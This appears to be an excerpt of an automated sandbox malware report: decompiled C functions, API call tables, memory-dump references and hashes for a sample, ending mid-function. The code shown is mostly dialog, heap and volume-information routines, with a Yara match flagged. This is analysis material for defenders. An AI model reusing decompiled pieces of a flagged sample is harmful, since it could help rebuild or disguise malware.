                                                                                                                                                                                                                                                                                          						if(_a12 != 0 || _a8 != 0x111) {
                                                                                                                                                                                                                                                                                          							L15:
                                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t41 = _a12;
                                                                                                                                                                                                                                                                                          							if(0x400 != _a12) {
                                                                                                                                                                                                                                                                                          								goto L15;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								 *_a20 = E000FD5E0(_t24, _t41 >> 0x10, 0x400, _a16);
                                                                                                                                                                                                                                                                                          								return 1;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						 *_t52 = _t47;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t52 + 4)) = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                          						EnterCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          						_t44 =  *0x170c80; // 0x0
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t52 + 8)) = _t44;
                                                                                                                                                                                                                                                                                          						 *0x170c80 = _t52;
                                                                                                                                                                                                                                                                                          						LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          						_t30 = PrintDlgA( *(_t47 + 0x24));
                                                                                                                                                                                                                                                                                          						asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                          						 *(_t47 + 4) = 0;
                                                                                                                                                                                                                                                                                          						return  ~_t30 + 2;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					 *_t51 = _t47;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t51 + 4)) = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                          					EnterCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          					_t40 =  *0x170c80; // 0x0
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t51 + 8)) = _t40;
                                                                                                                                                                                                                                                                                          					 *0x170c80 = _t51;
                                                                                                                                                                                                                                                                                          					LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          					_t34 = ChooseFontA(_t47 + 0x24);
                                                                                                                                                                                                                                                                                          					 *(_t47 + 4) = 0;
                                                                                                                                                                                                                                                                                          					if(_t34 != 0) {
                                                                                                                                                                                                                                                                                          						_t34 = E001096A0(_t47 + 0xa0,  *((intOrPtr*)(_t47 + 0x30)), 0x3c);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                          					return _t34 + 2;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                                          0x000faec0
                                                                                                                                                                                                                                                                                          0x000faec2
                                                                                                                                                                                                                                                                                          0x000faec8
                                                                                                                                                                                                                                                                                          0x000faeca
                                                                                                                                                                                                                                                                                          0x000faeca
                                                                                                                                                                                                                                                                                          0x000faecd
                                                                                                                                                                                                                                                                                          0x000faed2
                                                                                                                                                                                                                                                                                          0x000faf45
                                                                                                                                                                                                                                                                                          0x000faf4b
                                                                                                                                                                                                                                                                                          0x000faf4c
                                                                                                                                                                                                                                                                                          0x000faf4d
                                                                                                                                                                                                                                                                                          0x000faf4e
                                                                                                                                                                                                                                                                                          0x000faf4f
                                                                                                                                                                                                                                                                                          0x000faf50
                                                                                                                                                                                                                                                                                          0x000faf57
                                                                                                                                                                                                                                                                                          0x000faf58
                                                                                                                                                                                                                                                                                          0x000faf5a
                                                                                                                                                                                                                                                                                          0x000faf5a
                                                                                                                                                                                                                                                                                          0x000faf5d
                                                                                                                                                                                                                                                                                          0x000faf62
                                                                                                                                                                                                                                                                                          0x000fafb9
                                                                                                                                                                                                                                                                                          0x000fafbf
                                                                                                                                                                                                                                                                                          0x000fafc7
                                                                                                                                                                                                                                                                                          0x000fafc9
                                                                                                                                                                                                                                                                                          0x000fb001
                                                                                                                                                                                                                                                                                          0x000fb004
                                                                                                                                                                                                                                                                                          0x000fafd4
                                                                                                                                                                                                                                                                                          0x000fafd4
                                                                                                                                                                                                                                                                                          0x000fafdf
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fafe1
                                                                                                                                                                                                                                                                                          0x000faff6
                                                                                                                                                                                                                                                                                          0x000faffe
                                                                                                                                                                                                                                                                                          0x000faffe
                                                                                                                                                                                                                                                                                          0x000fafdf
                                                                                                                                                                                                                                                                                          0x000faf64
                                                                                                                                                                                                                                                                                          0x000faf64
                                                                                                                                                                                                                                                                                          0x000faf71
                                                                                                                                                                                                                                                                                          0x000faf74
                                                                                                                                                                                                                                                                                          0x000faf7a
                                                                                                                                                                                                                                                                                          0x000faf80
                                                                                                                                                                                                                                                                                          0x000faf88
                                                                                                                                                                                                                                                                                          0x000faf8e
                                                                                                                                                                                                                                                                                          0x000faf98
                                                                                                                                                                                                                                                                                          0x000fafa0
                                                                                                                                                                                                                                                                                          0x000fafa2
                                                                                                                                                                                                                                                                                          0x000fafad
                                                                                                                                                                                                                                                                                          0x000fafad
                                                                                                                                                                                                                                                                                          0x000faed4
                                                                                                                                                                                                                                                                                          0x000faed4
                                                                                                                                                                                                                                                                                          0x000faee1
                                                                                                                                                                                                                                                                                          0x000faee4
                                                                                                                                                                                                                                                                                          0x000faeea
                                                                                                                                                                                                                                                                                          0x000faef0
                                                                                                                                                                                                                                                                                          0x000faef8
                                                                                                                                                                                                                                                                                          0x000faefe
                                                                                                                                                                                                                                                                                          0x000faf08
                                                                                                                                                                                                                                                                                          0x000faf10
                                                                                                                                                                                                                                                                                          0x000faf19
                                                                                                                                                                                                                                                                                          0x000faf28
                                                                                                                                                                                                                                                                                          0x000faf2d
                                                                                                                                                                                                                                                                                          0x000faf32
                                                                                                                                                                                                                                                                                          0x000faf39
                                                                                                                                                                                                                                                                                          0x000faf39

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 000FAED6
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00170C68), ref: 000FAEE4
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00170C68), ref: 000FAEFE
                                                                                                                                                                                                                                                                                          • ChooseFontA.COMDLG32(?), ref: 000FAF08
                                                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 000FAF28
                                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C0000005,00000001,00000000,00000000,?,?,000F708D), ref: 000FAF45
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$ChooseCurrentEnterExceptionFontLeaveRaiseThread_memmove
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 986443956-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 7dc45b2e4bfc4b90fde0a096cf8870c9972aa8750f493688822f1cb70bb7a77a
                                                                                                                                                                                                                                                                                          • Instruction ID: c97b922d3f3de970ee059db26937e8aaf8937b46320ca86ae46889394fc8ad37
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7dc45b2e4bfc4b90fde0a096cf8870c9972aa8750f493688822f1cb70bb7a77a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2501D4B1E01711EBD3669F10DD89B9AB7B0FB09B20F108618F5099BE80D7B4A4C5CB80
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E00105693() {
                                                                                                                                                                                                                                                                                          				int _t3;
                                                                                                                                                                                                                                                                                          				long _t5;
                                                                                                                                                                                                                                                                                          				long _t7;
                                                                                                                                                                                                                                                                                          				long _t13;
                                                                                                                                                                                                                                                                                          				void* _t19;
                                                                                                                                                                                                                                                                                          				LONG* _t22;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t3 = IsProcessorFeaturePresent(0xc);
                                                                                                                                                                                                                                                                                          				if(_t3 != 0) {
                                                                                                                                                                                                                                                                                          					_t22 =  *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x34;
                                                                                                                                                                                                                                                                                          					_t5 =  *_t22;
                                                                                                                                                                                                                                                                                          					if(_t5 != 0) {
                                                                                                                                                                                                                                                                                          						L7:
                                                                                                                                                                                                                                                                                          						 *0x170c00 = _t5;
                                                                                                                                                                                                                                                                                          						_t7 = 1;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t19 = HeapAlloc(GetProcessHeap(), _t5, 8);
                                                                                                                                                                                                                                                                                          						_t7 = 0;
                                                                                                                                                                                                                                                                                          						if(_t19 != 0) {
                                                                                                                                                                                                                                                                                          							 *_t19 = 0;
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t19 + 4)) = 0;
                                                                                                                                                                                                                                                                                          							if(InterlockedCompareExchange(_t22, _t19, 0) != 0) {
                                                                                                                                                                                                                                                                                          								HeapFree(GetProcessHeap(), 0, _t19);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t5 =  *_t22;
                                                                                                                                                                                                                                                                                          							goto L7;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return _t7;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t13 = _t3 + 1;
                                                                                                                                                                                                                                                                                          					 *0x170c00 = _t13;
                                                                                                                                                                                                                                                                                          					return _t13;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                                          0x00105695
                                                                                                                                                                                                                                                                                          0x0010569d
                                                                                                                                                                                                                                                                                          0x001056b1
                                                                                                                                                                                                                                                                                          0x001056b4
                                                                                                                                                                                                                                                                                          0x001056b9
                                                                                                                                                                                                                                                                                          0x001056f5
                                                                                                                                                                                                                                                                                          0x001056f5
                                                                                                                                                                                                                                                                                          0x001056fc
                                                                                                                                                                                                                                                                                          0x001056bb
                                                                                                                                                                                                                                                                                          0x001056cd
                                                                                                                                                                                                                                                                                          0x001056cf
                                                                                                                                                                                                                                                                                          0x001056d3
                                                                                                                                                                                                                                                                                          0x001056d8
                                                                                                                                                                                                                                                                                          0x001056da
                                                                                                                                                                                                                                                                                          0x001056e5
                                                                                                                                                                                                                                                                                          0x001056ed
                                                                                                                                                                                                                                                                                          0x001056ed
                                                                                                                                                                                                                                                                                          0x001056f3
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001056f3
                                                                                                                                                                                                                                                                                          0x001056d3
                                                                                                                                                                                                                                                                                          0x00105700
                                                                                                                                                                                                                                                                                          0x0010569f
                                                                                                                                                                                                                                                                                          0x0010569f
                                                                                                                                                                                                                                                                                          0x001056a0
                                                                                                                                                                                                                                                                                          0x001056a5
                                                                                                                                                                                                                                                                                          0x001056a5

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000C,00105723,00000000,00000000,00104307), ref: 00105695
                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000018,00000008,00000000,00000000,?), ref: 001056C4
                                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 001056C7
                                                                                                                                                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 001056DD
                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001056EA
                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001056ED
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$AllocCompareExchangeFeatureFreeInterlockedPresentProcessor
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3509966971-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 845ec7e4b35019271ba22fd9336c187239564fe5e2c61280d1ca16b769b45bf5
                                                                                                                                                                                                                                                                                          • Instruction ID: 2266d246435db5c5aa01d1a5ae8ae30e950dbba6fff818098a458c461b0e8ba3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 845ec7e4b35019271ba22fd9336c187239564fe5e2c61280d1ca16b769b45bf5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E0169B2A00601AFEB11DFB9DD48E5637ADFB49741F418429F545C3640EBB4D9808B20
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                                                                                                                                                                          			E000FADC0(intOrPtr __eax, intOrPtr __esi) {
                                                                                                                                                                                                                                                                                          				signed int _t37;
                                                                                                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                                                                                                          				intOrPtr _t44;
                                                                                                                                                                                                                                                                                          				intOrPtr _t47;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t50;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t51;
                                                                                                                                                                                                                                                                                          				intOrPtr _t55;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t55 = __esi;
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(__esi + 0x24)) == 0) {
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(__esi + 0x24)) = __eax;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t50 = _t55 + 8;
                                                                                                                                                                                                                                                                                          				if(_t50 == 0) {
                                                                                                                                                                                                                                                                                          					RaiseException(0xc0000005, 1, 0, 0);
                                                                                                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                                                                                                          					_push(_t50);
                                                                                                                                                                                                                                                                                          					 *(_t55 + 4) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t55 + 0x14)) = 0;
                                                                                                                                                                                                                                                                                          					_t51 = _t55 + 0x24;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t55 + 0x18)) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t55 + 0x1c)) = 0;
                                                                                                                                                                                                                                                                                          					 *(_t55 + 0x20) = DefWindowProcA;
                                                                                                                                                                                                                                                                                          					E00106820(_t51, 0, 0x3c);
                                                                                                                                                                                                                                                                                          					_t44 = _t55 + 0xa0;
                                                                                                                                                                                                                                                                                          					E00106820(_t44, 0, 0x3c);
                                                                                                                                                                                                                                                                                          					E00106820(_t55 + 0x60, 0, 0x40);
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t55 + 0x28)) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t55 + 0x3c)) = 0;
                                                                                                                                                                                                                                                                                          					 *_t51 = 0x3c;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t55 + 0x50)) = _t55 + 0x60;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t55 + 0x30)) = _t44;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t55 + 0x38)) = 0x109;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t55 + 0x44)) =  &M000F56C0;
                                                                                                                                                                                                                                                                                          					return _t55;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					 *_t50 = _t55;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t50 + 4)) = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                          					EnterCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          					_t47 =  *0x170c80; // 0x0
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t50 + 8)) = _t47;
                                                                                                                                                                                                                                                                                          					 *0x170c80 = _t50;
                                                                                                                                                                                                                                                                                          					LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t55 + 0x78)) == 0) {
                                                                                                                                                                                                                                                                                          						_t37 = GetSaveFileNameA(_t55 + 0x20);
                                                                                                                                                                                                                                                                                          						asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                          						 *(_t55 + 4) = 0;
                                                                                                                                                                                                                                                                                          						return  ~_t37 + 2;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t40 = GetOpenFileNameA(_t55 + 0x20);
                                                                                                                                                                                                                                                                                          						asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                          						 *(_t55 + 4) = 0;
                                                                                                                                                                                                                                                                                          						return  ~_t40 + 2;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                                                                          0x000fadc0
                                                                                                                                                                                                                                                                                          0x000fadc5
                                                                                                                                                                                                                                                                                          0x000fadc7
                                                                                                                                                                                                                                                                                          0x000fadc7
                                                                                                                                                                                                                                                                                          0x000fadca
                                                                                                                                                                                                                                                                                          0x000fadcf
                                                                                                                                                                                                                                                                                          0x000fae46
                                                                                                                                                                                                                                                                                          0x000fae4c
                                                                                                                                                                                                                                                                                          0x000fae4d
                                                                                                                                                                                                                                                                                          0x000fae4e
                                                                                                                                                                                                                                                                                          0x000fae4f
                                                                                                                                                                                                                                                                                          0x000fae57
                                                                                                                                                                                                                                                                                          0x000fae5a
                                                                                                                                                                                                                                                                                          0x000fae5f
                                                                                                                                                                                                                                                                                          0x000fae63
                                                                                                                                                                                                                                                                                          0x000fae67
                                                                                                                                                                                                                                                                                          0x000fae6a
                                                                                                                                                                                                                                                                                          0x000fae6d
                                                                                                                                                                                                                                                                                          0x000fae70
                                                                                                                                                                                                                                                                                          0x000fae77
                                                                                                                                                                                                                                                                                          0x000fae80
                                                                                                                                                                                                                                                                                          0x000fae8d
                                                                                                                                                                                                                                                                                          0x000fae97
                                                                                                                                                                                                                                                                                          0x000fae9a
                                                                                                                                                                                                                                                                                          0x000faea0
                                                                                                                                                                                                                                                                                          0x000faea7
                                                                                                                                                                                                                                                                                          0x000faeaa
                                                                                                                                                                                                                                                                                          0x000faead
                                                                                                                                                                                                                                                                                          0x000faeb4
                                                                                                                                                                                                                                                                                          0x000faebe
                                                                                                                                                                                                                                                                                          0x000fadd1
                                                                                                                                                                                                                                                                                          0x000fadd1
                                                                                                                                                                                                                                                                                          0x000fadde
                                                                                                                                                                                                                                                                                          0x000fade1
                                                                                                                                                                                                                                                                                          0x000fade7
                                                                                                                                                                                                                                                                                          0x000faded
                                                                                                                                                                                                                                                                                          0x000fadf5
                                                                                                                                                                                                                                                                                          0x000fadfb
                                                                                                                                                                                                                                                                                          0x000fae05
                                                                                                                                                                                                                                                                                          0x000fae25
                                                                                                                                                                                                                                                                                          0x000fae2d
                                                                                                                                                                                                                                                                                          0x000fae2f
                                                                                                                                                                                                                                                                                          0x000fae3a
                                                                                                                                                                                                                                                                                          0x000fae07
                                                                                                                                                                                                                                                                                          0x000fae0b
                                                                                                                                                                                                                                                                                          0x000fae13
                                                                                                                                                                                                                                                                                          0x000fae15
                                                                                                                                                                                                                                                                                          0x000fae20
                                                                                                                                                                                                                                                                                          0x000fae20
                                                                                                                                                                                                                                                                                          0x000fae05

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 000FADD3
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00170C68,?,000F73BA), ref: 000FADE1
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00170C68,?,000F73BA), ref: 000FADFB
                                                                                                                                                                                                                                                                                          • GetOpenFileNameA.COMDLG32(?,?,000F73BA), ref: 000FAE0B
                                                                                                                                                                                                                                                                                          • GetSaveFileNameA.COMDLG32(?,?,000F73BA), ref: 000FAE25
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalFileNameSection$CurrentEnterLeaveOpenSaveThread
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3486278792-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 668bc60c5104a2ad5663ace47673f7562bc5281382abb864b3cfe54b4714a7ec
                                                                                                                                                                                                                                                                                          • Instruction ID: ca5dc9b0d17138f41391f51a0a99e7f02505382242462c46cc77c723d8aff5f9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 668bc60c5104a2ad5663ace47673f7562bc5281382abb864b3cfe54b4714a7ec
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39014CB1A40B04DBD3668F64ED49B6677F0FB48B01F108A1CF24A87D90D7B4A0C4CB01
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000103), ref: 0252B561
                                                                                                                                                                                                                                                                                          • GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 0252B5A4
                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,0019660D,00000000,00000000,00000000), ref: 0252B6EC
                                                                                                                                                                                                                                                                                          • lstrcpyn.KERNEL32(0019660D,0019660C,?), ref: 0252B70D
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ByteCharDirectoryInformationMultiSystemVolumeWidelstrcpyn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1524148605-3916222277
                                                                                                                                                                                                                                                                                          • Opcode ID: a5435f2ce1c0891dcaf4177d242b49e362ebce4048e03922acf19b48be790683
                                                                                                                                                                                                                                                                                          • Instruction ID: 2426d713aa2f4806f18cb106a93c70eb9de0be6df51c69e6e8503e385708e011
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5435f2ce1c0891dcaf4177d242b49e362ebce4048e03922acf19b48be790683
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE512A719043289FDF25CF54CC88BEAB7B9BB45304F1482D9E549662C0DB75AB88CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E000F2BE0(char* __eax, void* __ecx, CHAR** __edi) {
                                                                                                                                                                                                                                                                                          				char* _v8;
                                                                                                                                                                                                                                                                                          				CHAR* _t17;
                                                                                                                                                                                                                                                                                          				char _t18;
                                                                                                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                                                                                                          				CHAR* _t21;
                                                                                                                                                                                                                                                                                          				void* _t22;
                                                                                                                                                                                                                                                                                          				CHAR* _t26;
                                                                                                                                                                                                                                                                                          				CHAR* _t29;
                                                                                                                                                                                                                                                                                          				CHAR* _t30;
                                                                                                                                                                                                                                                                                          				CHAR* _t31;
                                                                                                                                                                                                                                                                                          				void* _t32;
                                                                                                                                                                                                                                                                                          				CHAR* _t38;
                                                                                                                                                                                                                                                                                          				void* _t41;
                                                                                                                                                                                                                                                                                          				CHAR* _t44;
                                                                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                                                                                                          				CHAR* _t50;
                                                                                                                                                                                                                                                                                          				CHAR** _t63;
                                                                                                                                                                                                                                                                                          				char* _t65;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t63 = __edi;
                                                                                                                                                                                                                                                                                          				_t65 = __eax;
                                                                                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                                                                                          					_t17 =  *_t63;
                                                                                                                                                                                                                                                                                          					_t49 =  *_t17 + 0xfffffff7;
                                                                                                                                                                                                                                                                                          					if(_t49 > 0x17) {
                                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					switch( *((intOrPtr*)(( *(_t49 + 0xf2d20) & 0x000000ff) * 4 +  &M000F2D18))) {
                                                                                                                                                                                                                                                                                          						case 0:
                                                                                                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                                                                                                          						case 1:
                                                                                                                                                                                                                                                                                          							goto L4;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L4:
                                                                                                                                                                                                                                                                                          				_t50 = _t17;
                                                                                                                                                                                                                                                                                          				_t18 =  *_t50;
                                                                                                                                                                                                                                                                                          				if(_t18 != 0) {
                                                                                                                                                                                                                                                                                          					_v8 = _t65;
